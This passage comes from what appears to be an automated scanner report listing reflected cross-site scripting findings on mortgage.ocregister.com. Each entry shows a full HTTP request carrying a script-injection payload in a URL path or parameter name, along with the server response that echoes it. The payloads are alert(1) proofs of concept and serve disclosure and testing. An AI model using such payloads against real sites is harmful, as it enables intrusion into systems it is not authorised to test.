Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:10 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/07d875f\"><script>alert(1)</script>52705fa9729/feed/" />
...[SNIP]...

1.264. http://mortgage.ocregister.com/2008/07/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/07/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dd31"><script>alert(1)</script>6838ed82b90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4dd31\"><script>alert(1)</script>6838ed82b90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/07/?4dd31"><script>alert(1)</script>6838ed82b90=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 July - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/07/?4dd31\"><script>alert(1)</script>6838ed82b90=1feed/" />
...[SNIP]...

1.265. http://mortgage.ocregister.com/2008/08/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/08/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d08"><script>alert(1)</script>16a3cd6aa1d was submitted in the REST URL parameter 1. This input was echoed as a8d08\"><script>alert(1)</script>16a3cd6aa1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008a8d08"><script>alert(1)</script>16a3cd6aa1d/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008a8d08\"><script>alert(1)</script>16a3cd6aa1d/08/feed/" />
...[SNIP]...

1.266. http://mortgage.ocregister.com/2008/08/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/08/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b270c"><script>alert(1)</script>13e7c115bbc was submitted in the REST URL parameter 2. This input was echoed as b270c\"><script>alert(1)</script>13e7c115bbc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/08b270c"><script>alert(1)</script>13e7c115bbc/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:10 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/08b270c\"><script>alert(1)</script>13e7c115bbc/feed/" />
...[SNIP]...

1.267. http://mortgage.ocregister.com/2008/08/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/08/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d635"><script>alert(1)</script>be7b47f3057 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d635\"><script>alert(1)</script>be7b47f3057 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/08/?5d635"><script>alert(1)</script>be7b47f3057=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 August - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/08/?5d635\"><script>alert(1)</script>be7b47f3057=1feed/" />
...[SNIP]...

1.268. http://mortgage.ocregister.com/2008/08/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/08/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d8d85'><script>alert(1)</script>758d680b117 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d8d85\\\'><script>alert(1)</script>758d680b117 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/08/?d8d85'><script>alert(1)</script>758d680b117=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<a href='/2008/08/?d8d85\\\'><script>alert(1)</script>758d680b117=1&dem_add_user_answer=true&dem_poll_id=31' rel='nofollow' onclick='return dem_addAnswer(this)' class='dem-add-answer'>
...[SNIP]...

1.269. http://mortgage.ocregister.com/2008/09/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/09/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd248"><script>alert(1)</script>480904c2d4d was submitted in the REST URL parameter 1. This input was echoed as cd248\"><script>alert(1)</script>480904c2d4d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008cd248"><script>alert(1)</script>480904c2d4d/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008cd248\"><script>alert(1)</script>480904c2d4d/09/feed/" />
...[SNIP]...

1.270. http://mortgage.ocregister.com/2008/09/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/09/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c5ee"><script>alert(1)</script>57e09d4d961 was submitted in the REST URL parameter 2. This input was echoed as 4c5ee\"><script>alert(1)</script>57e09d4d961 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/094c5ee"><script>alert(1)</script>57e09d4d961/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/094c5ee\"><script>alert(1)</script>57e09d4d961/feed/" />
...[SNIP]...

1.271. http://mortgage.ocregister.com/2008/09/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/09/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f1dce'><script>alert(1)</script>c8a81c077b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1dce\\\'><script>alert(1)</script>c8a81c077b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/09/?f1dce'><script>alert(1)</script>c8a81c077b7=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 112237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<a href='/2008/09/?f1dce\\\'><script>alert(1)</script>c8a81c077b7=1&dem_add_user_answer=true&dem_poll_id=34' rel='nofollow' onclick='return dem_addAnswer(this)' class='dem-add-answer'>
...[SNIP]...

1.272. http://mortgage.ocregister.com/2008/09/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/09/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e00c"><script>alert(1)</script>73475f88de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e00c\"><script>alert(1)</script>73475f88de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/09/?2e00c"><script>alert(1)</script>73475f88de=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 112212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 September - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/09/?2e00c\"><script>alert(1)</script>73475f88de=1feed/" />
...[SNIP]...

1.273. http://mortgage.ocregister.com/2008/10/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/10/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e3b3"><script>alert(1)</script>c80cc7f5054 was submitted in the REST URL parameter 1. This input was echoed as 7e3b3\"><script>alert(1)</script>c80cc7f5054 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20087e3b3"><script>alert(1)</script>c80cc7f5054/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:09 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20087e3b3\"><script>alert(1)</script>c80cc7f5054/10/feed/" />
...[SNIP]...

1.274. http://mortgage.ocregister.com/2008/10/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/10/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf0d1"><script>alert(1)</script>8fa7ed5b19f was submitted in the REST URL parameter 2. This input was echoed as bf0d1\"><script>alert(1)</script>8fa7ed5b19f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/10bf0d1"><script>alert(1)</script>8fa7ed5b19f/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/10bf0d1\"><script>alert(1)</script>8fa7ed5b19f/feed/" />
...[SNIP]...

1.275. http://mortgage.ocregister.com/2008/10/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/10/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae4c"><script>alert(1)</script>170041f3cf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eae4c\"><script>alert(1)</script>170041f3cf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/10/?eae4c"><script>alert(1)</script>170041f3cf9=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 110972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2008 October - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/10/?eae4c\"><script>alert(1)</script>170041f3cf9=1feed/" />
...[SNIP]...

1.276. http://mortgage.ocregister.com/2008/11/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/11/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fc1b"><script>alert(1)</script>2d130c53a29 was submitted in the REST URL parameter 1. This input was echoed as 6fc1b\"><script>alert(1)</script>2d130c53a29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /20086fc1b"><script>alert(1)</script>2d130c53a29/11/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:09 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20086fc1b\"><script>alert(1)</script>2d130c53a29/11/feed/" />
...[SNIP]...

1.277. http://mortgage.ocregister.com/2008/11/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2008/11/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3cd6"><script>alert(1)</script>c5248f34aad was submitted in the REST URL parameter 2. This input was echoed as b3cd6\"><script>alert(1)</script>c5248f34aad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2008/11b3cd6"><script>alert(1)</script>c5248f34aad/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:12 GMT
Server: Apache
